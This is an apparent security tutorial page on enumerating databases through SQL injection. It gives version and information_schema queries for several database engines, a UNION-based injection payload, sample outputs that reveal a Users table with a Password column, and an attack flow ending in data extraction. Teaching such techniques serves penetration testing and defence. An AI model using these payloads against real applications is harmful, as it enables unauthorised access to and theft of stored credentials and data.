Skip to content
Ultimate Degree

SQL Injection Database Enumeration

To perform a successful SQL injection attack, you need to understand the database structure and the data it contains. This section covers the SQL queries used to enumerate the database structure and the data it contains.

Version Detection

Database Version Queries

-- Microsoft, MySQL
SELECT @@version


-- Oracle
SELECT * FROM v$version


-- PostgreSQL
SELECT version()

Example Attack

' UNION SELECT @@version--

Sample Output

Terminal window
Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64)
Mar 18 2018 09:11:49
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows Server 2016 Standard 10

Database Structure Enumeration

Listing Tables

SELECT * FROM information_schema.tables

Sample Output

Terminal window
TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME  TABLE_TYPE
================================================
MyDatabase    dbo           Products    BASE TABLE
MyDatabase    dbo           Users       BASE TABLE
MyDatabase    dbo           Feedback    BASE TABLE

Listing Columns

SELECT * FROM information_schema.columns WHERE table_name = 'Users'

Sample Output

Terminal window
TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME  COLUMN_NAME  DATA_TYPE
==============================================================
MyDatabase    dbo           Users       UserId       int
MyDatabase    dbo           Users       Username     varchar
MyDatabase    dbo           Users       Password     varchar

Key Notes

  • Information schema available in most databases (except Oracle).
  • Use version detection to tailor further attacks.
  • Schema enumeration is crucial for data extraction.

Common Attack Flow

  1. Identify database type/version
  2. Query information schema
  3. Map database structure
  4. Target sensitive tables/columns
  5. Extract data using discovered information